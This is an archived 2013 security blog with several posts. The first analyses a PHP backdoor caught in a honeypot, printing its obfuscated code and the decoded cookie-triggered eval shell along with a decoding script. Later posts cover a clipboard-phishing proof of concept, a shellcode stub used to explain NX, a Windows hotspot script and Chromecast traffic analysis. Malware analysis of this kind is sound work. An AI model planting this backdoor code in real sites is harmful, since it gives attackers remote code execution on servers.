Tuesday, November 19, 2013

Iloveyou PHP Backdoor

One of my botnets, eh, honeynets, managed to catch this nifty PHP script.

$sdfv="oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19";
$kisg = str_replace("ar","","sartarrar_rarearparlaracare");
$ltjz="yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL";
$ynsx="CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9";
$dkhg="JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof";
$gsqn = $kisg("dk", "", "bdkadksdkedk64dk_dkddkecdkode");
$zuzt = $kisg("z","","zczrzezatze_zfzuznzcztzion");
$lyyq = $zuzt('', $gsqn($kisg("of", "", $dkhg.$sdfv.$ltjz.$ynsx))); $lyyq();?>

It's pretty much straightforward just by having a glance at it.

$kisg is actually str_replace
$gsqn is base64_decode
$zuzt is create_function

Cleaning up this badware stuff gives us

$lyyq = create_function(base64_decode("JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdpbCcgJiYgJGMoJGEpPjMpeyRrPSdvdmV5b3UnO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNobyAnPC8nLiRrLic+Jzt9"));

Final output (the body handed to create_function):

$lyyq = create_function($c='count';$a=$_COOKIE;if(reset($a)=='il' && $c($a)>3){$k='oveyou';echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';})
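As an added illustration (not part of the original post), this Python snippet replays the decoding above offline: it resolves the three str_replace-built names, rebuilds the base64 blob from the four fragments, decodes the body passed to create_function, and pulls out the tags the backdoor echoes around its eval() output, which is the cheapest response-side indicator a defender can watch for. The fragment strings are copied from the sample; the helper names are mine.

```python
import base64
import re

# Obfuscated fragments copied from the sample above; the script concatenates
# them in the order $dkhg.$sdfv.$ltjz.$ynsx before stripping the filler "of".
SDFV = "oofJGEpofPjMpeyRrPSdvofdmVof5b3UnofO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19"
LTJZ = "yZofXBsYWNlKGFycmofF5KCcvW15cdz1cc10vJywnL1xzLycpLCBhofcnJofheSofgnJywnKycpL"
YNSX = "CBqb2luKGFycmF5X3NsaWNoflKCRofhLofCRjKCRhKS0zKSofkpKSkof7ZWNobyAnofPC8nLiRrLiofc+Jztof9"
DKHG = "JGofMof9J2NvofdW5of0JzskYT0kX0NPT0tofJRTtpZihyZXNldCgkYSk9ofPSdpbCcgJiYgJGMof"


def php_str_replace(search, replace, subject):
    """PHP str_replace makes one left-to-right pass, exactly like str.replace."""
    return subject.replace(search, replace)


def resolve_names():
    """The three function names the script hides behind str_replace."""
    kisg = php_str_replace("ar", "", "sartarrar_rarearparlaracare")
    gsqn = php_str_replace("dk", "", "bdkadksdkedk64dk_dkddkecdkode")
    zuzt = php_str_replace("z", "", "zczrzezatze_zfzuznzcztzion")
    return kisg, gsqn, zuzt


def recover_payload():
    """Rebuild the base64 blob and decode the body handed to create_function."""
    b64 = php_str_replace("of", "", DKHG + SDFV + LTJZ + YNSX)
    body = base64.b64decode(b64).decode("ascii")
    return body, b64


def response_markers(body):
    """The tags echoed around the eval() output: '<' . $k . '>' and '</' . $k . '>'."""
    m = re.search(r"\$k='([^']*)'", body)
    if not m:
        return None
    return "<%s>" % m.group(1), "</%s>" % m.group(1)


if __name__ == "__main__":
    print(resolve_names())
    body, _ = recover_payload()
    print(body)
    print(response_markers(body))
```

Grepping web server responses for the marker pair returned by response_markers is a quick way to spot the shell being driven, since it wraps every command's output in them.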


Conclusion? The author of this backdoor must be romantic..



Friday, October 25, 2013

Replicating Malware Function For Fun and Profits!!!!

At Scan Assoc, we are allowed to play and be creative with our viruses/malware to the max without any useless restraining policy...
If you read this post and see the video below:


You know it's fun.
Basically it's using VBS scripting to copy the clipboard...

I've replicated a similar technique, also using VBS scripting and a bat script, as a POC..
It's a very innovative attack for phishing....

Source code is in the video..
This is just a POC; there's a way to bypass the latest IE security clipboard warning!!!



Sunday, October 13, 2013

A simple explanation of how NX/PaX works.

This is nothing more than a recap of how NX/PaX works and why it's important to understand, for beginners in exploitation, for writing CTF flags :p, and for reading other interesting people's papers.

Below is the simplest code, a bad example, of how to execute a shellcode.

unsigned char code[] = "\xcc";
int main(int argc, char **argv)
{
  int (*func)();
  func = (int (*)()) code;
  (int)(*func)();
}


Explanation:
1. We declare a function pointer called func.
2. func is pointed at the memory location of code.
3. Execute whatever is pointed to by func(), which is to say whatever bytes reside in code.
Try compiling and running:
gcc example1.c -o example ; ./example
Segmentation fault
Why? To understand this problem: modern compilers by default enforce the NX bit on the stack region of the process. Any "local variable" that we declare will be loaded into the stack region of memory. And what does it mean to us? To generalize our understanding, we know a region of memory in a computer can have 3 properties:
1. Read: we can read and have access to the memory.
2. Write: we can write data to that particular region.
3. Execute: the code in that particular region can be executed.
cat /proc/3976/maps 
08048000-08049000 r-xp 00000000 08:01 1447191    /root/bypassav/example
08049000-0804a000 rw-p 00000000 08:01 1447191    /root/bypassav/example
b7e62000-b7e63000 rw-p 00000000 00:00 0 
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r--p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rw-p 0015e000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rw-p 00000000 00:00 0 
b7fdf000-b7fe1000 rw-p 00000000 00:00 0 
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r--p 0001b000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rw-p 0001c000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
As you can see, right now the stack region is marked read-write..... no x means that code in that region couldn't be executed..
Now that we understand the stack region is protected, attackers evolved their attacks into ROP or ret2libc-style (ret2-whatever-lib) programming. But that's beyond the scope of this post. Having said that, it's still possible to get your code executed by using the mmap trick. To make everyone happy, here I cheat a little using execstack just to see the difference..
gcc example1.c -o example ; execstack -s example; ./example 
Trace/breakpoint trap
cat /proc/4125/maps
08048000-08049000 r-xp 00000000 08:01 1447203    /root/bypassav/example
08049000-0804a000 rwxp 00000000 08:01 1447203    /root/bypassav/example
b7e62000-b7e63000 rwxp 00000000 00:00 0 
b7e63000-b7fbf000 r-xp 00000000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fbf000-b7fc0000 ---p 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc0000-b7fc2000 r-xp 0015c000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc2000-b7fc3000 rwxp 0015e000 08:01 1311258    /lib/i386-linux-gnu/i686/cmov/libc-2.13.so
b7fc3000-b7fc6000 rwxp 00000000 00:00 0 
b7fdf000-b7fe1000 rwxp 00000000 00:00 0 
b7fe1000-b7fe2000 r-xp 00000000 00:00 0          [vdso]
b7fe2000-b7ffe000 r-xp 00000000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7ffe000-b7fff000 r-xp 0001b000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
b7fff000-b8000000 rwxp 0001c000 08:01 1311294    /lib/i386-linux-gnu/ld-2.13.so
bffdf000-c0000000 rwxp 00000000 00:00 0          [stack]
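As an added check (not from the original post), here is the test a defender runs over a maps dump: parse each mapping's permission field and report any region that is both writable and executable, plus whether [stack] carries x. The two inputs are trimmed excerpts of the dumps above; the function names are mine.

```python
import re

# Constructed excerpts of the two /proc/PID/maps dumps shown above,
# before and after "execstack -s".
MAPS_NX = """\
08048000-08049000 r-xp 00000000 08:01 1447191    /root/bypassav/example
08049000-0804a000 rw-p 00000000 08:01 1447191    /root/bypassav/example
b7fc3000-b7fc6000 rw-p 00000000 00:00 0
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]
"""

MAPS_EXECSTACK = """\
08048000-08049000 r-xp 00000000 08:01 1447203    /root/bypassav/example
08049000-0804a000 rwxp 00000000 08:01 1447203    /root/bypassav/example
b7fc3000-b7fc6000 rwxp 00000000 00:00 0
bffdf000-c0000000 rwxp 00000000 00:00 0          [stack]
"""

# start-end perms offset dev inode [path]
LINE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+) ([rwxps-]{4}) \S+ \S+ \S+\s*(.*)$")


def parse_maps(text):
    """Yield (start, end, perms, path) for every mapping line."""
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            yield int(m.group(1), 16), int(m.group(2), 16), m.group(3), m.group(4)


def wx_regions(text):
    """Mappings that are both writable and executable (W^X violations)."""
    return [(hex(s), hex(e), p, path) for s, e, p, path in parse_maps(text)
            if "w" in p and "x" in p]


def stack_executable(text):
    """True when the [stack] mapping carries the x bit."""
    return any(path == "[stack]" and "x" in p for _, _, p, path in parse_maps(text))


if __name__ == "__main__":
    for label, dump in (("default build", MAPS_NX), ("after execstack", MAPS_EXECSTACK)):
        print(label, "rwx regions:", wx_regions(dump), "stack exec:", stack_executable(dump))
```

On a live Linux process the same functions can be fed the text of /proc/self/maps to confirm nothing is rwx. Note that code[] is a global, so in the first dump it sits in the binary's rw-p data mapping rather than the stack; either way it has no x bit until execstack sets the flag.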


Oh, HITB 2013 KUL starts tomorrow.. See you there soon!

Monday, September 16, 2013

Bat script for setting your notebook up as a wireless AP

Captive portal / Layer 2 isolation is a no-no for Chromecast.. So, I'm in Kelate right now; here's a quick bat script for setting up your Windows 7 as an AP.. Run as administrator, of course.


ap.bat

ECHO OFF
netsh wlan set hostednetwork mode=allow
netsh wlan set hostednetwork ssid=PUTYOUROWNSSID key=buhpasswordsendiri keyUsage=persistent
netsh wlan start hostednetwork


Use ICS with your No4G, or whatever.. More info:

http://msdn.microsoft.com/en-us/library/dd815243%28VS.85%29.aspx



Friday, September 13, 2013

Chromecast Experience in .MY Part 3

Okay, part 3... It's pretty short and simple.. They say when you manage to produce a UML, the program is already completed :p


Chromecast Experience in .MY Part 2.

"Check out my new iPhone, it's using a 64-bit ARM. Not sure what it does, but cool."
"My latest Samsung is using a triple-core processor. It's fast."

Unless you have direct benefits from using such devices with those features, you are nothing more than a mere human being consumed by the homogenization of modernity.

This is the second part of Chromecast Experience. How does Chromecast work?
The Chromecast Developer Guide has made a beautiful picture of it.


So how does casting work? When you first boot your Chromecast, a web service runs and listens on port 8008. From a black-box point of view it's probably a heavy modification of node.js, most likely with a RESTful implementation of a web API. Oh, and it's using DIAL.
So how does it work? Let's run our sniffer. Many people would prefer tcpdump or Wireshark, but hey, Windows does it charmingly with Microsoft Network Monitor. The coolest thing about this tool is that you can filter by application; in this case we filter on chrome.

Each time we issue a cast we actually "dial" for it. When casting to the YouTube application, we send a GET request to /apps/YouTube


And the information that we retrieve is in XML format, hinting at the DIAL implementation in Chromecast.



From the DIAL developer guide:


The rules of the DIAL service..

1. First we send a DIAL request for the application (YouTube, Netflix).
2. The DIAL server responds with OK.
3. Then we POST the application URL in JSON format. It's actually a URL forwarding technique.
4. The DIAL server responds. (Chromecast will launch its request via GET/POST to Netflix or YouTube.)


At any application launch, the app (Netflix or YouTube) can be killed by issuing an HTTP DELETE.
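As an added example (mine, not from the post or from Google's SDK), this Python snippet models the exchange just described: it parses the XML a DIAL server returns for GET /apps/YouTube, then plans the follow-up, a POST of the launch payload when the app is stopped or a DELETE of the running instance to kill it. The XML sample is constructed in the DIAL 1.7 layout; the DELETE target being the app URL plus its "run" link is an assumption from that spec, and the host 192.0.2.10 is a placeholder.

```python
import xml.etree.ElementTree as ET
from urllib.request import Request, urlopen

DIAL_NS = "{urn:dial-multiscreen-org:schemas:dial}"

# Constructed sample of the XML a DIAL server returns for GET /apps/YouTube
# (DIAL 1.7 layout; the post's own capture is not reproduced here).
SAMPLE_APP_XML = """<?xml version="1.0" encoding="UTF-8"?>
<service xmlns="urn:dial-multiscreen-org:schemas:dial" dialVer="1.7">
  <name>YouTube</name>
  <options allowStop="true"/>
  <state>running</state>
  <link rel="run" href="run"/>
</service>"""


def parse_app_state(xml_text):
    """Return (name, state, allow_stop, run_href) from a DIAL app description."""
    root = ET.fromstring(xml_text)
    opts = root.find(DIAL_NS + "options")
    link = root.find(DIAL_NS + "link")
    return (root.findtext(DIAL_NS + "name"),
            root.findtext(DIAL_NS + "state"),
            opts is not None and opts.get("allowStop") == "true",
            link.get("href") if link is not None else None)


def plan_exchange(host, app, state_xml, launch_body=None):
    """Requests for the flow above: GET the app, then POST the launch payload
    when it is stopped, or DELETE the running instance to kill it.
    Returns (method, url, body) tuples; nothing is sent."""
    base = "http://%s:8008/apps/%s" % (host, app)
    _, state, allow_stop, run_href = parse_app_state(state_xml)
    reqs = [("GET", base, None)]
    if state == "stopped":
        reqs.append(("POST", base, launch_body))
    elif state == "running" and allow_stop and run_href:
        reqs.append(("DELETE", base + "/" + run_href, None))
    return reqs


def send(method, url, body=None):
    """Issue one planned request against a real device (needs network access)."""
    headers = {"Content-Type": "application/json"} if body else {}
    req = Request(url, data=body.encode() if body else None, headers=headers, method=method)
    with urlopen(req, timeout=5) as resp:
        return resp.status, resp.read().decode("utf-8", "replace")
```

Anything on the LAN can drive this sequence, since the service has no authentication; that is worth remembering when placing the device on a shared network.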

Common HTTP requests can be found in the DIAL developer manual. Fiqueet.com has listed common requests that you can make, with curl examples:
get device information xml:
curl http://x.x.x.x:8008/ssdp/device-desc.xml
get detailed device information json:
curl http://x.x.x.x:8008/setup/eureka_info?options=detail
scan for available wifi:
curl http://x.x.x.x:8008/setup/scan_results
get supported time zones:
curl http://x.x.x.x:8008/setup/supported_timezones
get info about current app:
curl -H "Content-Type: application/json" http://x.x.x.x:8008/apps/YouTube -X GET
Which gets back to us.. How is the video streamed to us? Here is an incorrect pseudo-diagram, but sufficient enough.


By now you should have at least an idea of how to bypass it. If not, you can wait for Part 3.


Thursday, September 12, 2013

Chromecast Experience in .MY Part 1.

Living is not that easy these days. The cost of living has increased to a point where a mere average-salary guy like me has a little bit of trouble coping with my current life. Yeap, I admit I do have some sort of financial difficulty. But Alhamdulillah, I am blessed with good family and friends who are willing to help me survive the capitalistic nature of today's modernity.

Nonetheless, the difficulty in one's life shouldn't be a burden to the soul in the quest of acquiring new knowledge.
A few months back, Google released the Chromecast. "A device that makes your Smart TV smarter"..


It cost us 35 bucks + 6 dollars shipping. Thanks to a friend of mine, Amir Shahir, who kindly bought it for me.
iFixit has done a teardown for us. You can look on their website to see the inside of the Chromecast.

Powering up the device is straightforward. Simply plug it into your HDMI port, and USB for power, and it will boot up.


On my Sharp TV



Yeah, it's upside down, dunno why.

Anyway, the whole Chromecast is actually a custom lightweight web browser with HTML5 + JavaScript + CSS support. You can cast your content over WebRTC (since WebRTC supports peer connections) or forward certain streaming sites' requests, such as YouTube and Netflix (at this moment)..

Unfortunately we're living outside of the States, so surfing Netflix is going to be a bit of a problem.. Viewing geo-locked content is not a problem for PC users, since a lot of proxies and VPNs can be used to bypass the protection.

That's not the situation with Chromecast. This pricey small thing is a bad-ass. You couldn't rig it at all. The DNS resolver is hardcoded in the device itself. One could root the device with a previous firmware, but Google is also playing evil by updating the device's firmware without notifying the user; same goes for Google Chrome..

Solutions?

If you cannot customize/root the device, then you make the device's program behave like it was rooted. So for the past 48 hours, I've been testing and analysing the Chromecast traffic and studying the art of bypassing an unbypassable device.. Hey presto, the solution is simple; I managed to sketch it on a nice A4..


Continued soon...
Just in case nobody believes me, it's possible even using a Telekom-brand DIR-615...